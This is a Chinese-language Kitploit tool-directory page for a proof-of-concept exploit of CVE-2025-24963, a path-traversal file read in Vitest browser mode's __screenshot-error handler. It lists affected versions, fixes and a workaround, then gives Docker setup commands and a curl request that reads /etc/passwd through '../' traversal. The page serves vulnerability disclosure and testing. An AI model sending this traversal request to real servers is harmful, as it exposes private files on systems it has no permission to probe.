Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24963 — 概念验证利用针对CVE-2025-24963,这是一个Vitest浏览器模式下的本地文件读取漏洞,通过__screenshot-error处理程序,允许在暴露的服务器上披露任意文件。 | Kitploit
工具/GitHubGitHub/hiteshpatra/cve-2025-24963
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

概念验证利用针对CVE-2025-24963,这是一个Vitest浏览器模式下的本地文件读取漏洞,通过__screenshot-error处理程序,允许在暴露的服务器上披露任意文件。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24963 - Vitest 浏览器模式 - 本地文件读取

CVE-2025-24963 是一个中等严重性的漏洞(CVSS 3.1 评分:5.9),影响 @vitest/browser 包,该包是 Vitest 测试框架的组件,基于 Vite 开发。该漏洞源于浏览器模式 HTTP 服务器的 __screenshot-error 处理程序中对输入验证不当。当服务器通过配置选项 browser.api.host: true 暴露于网络时,攻击者可以发送特制请求以访问服务器文件系统上的任意文件,可能导致敏感信息未授权泄露。

受影响版本

该漏洞影响以下版本的 @vitest/browser:

  • 2.0.4 到 2.1.8
  • 3.0.0 到 3.0.3

缓解措施

此问题已在版本 2.1.9 和 3.0.4 中得到修复。强烈建议用户升级到这些版本或更高版本以缓解漏洞。

临时解决方案

如果无法立即升级,临时的解决方案是避免将浏览器模式服务器暴露于网络,不在配置中设置 browser.api.host: true。这将阻止外部访问存在漏洞的处理程序。

准备环境

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

注意:Vitest 使用的端口是动态的(例如 63315)。你可能需要监控日志并相应调整 -p 标志。

利用

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
下载工具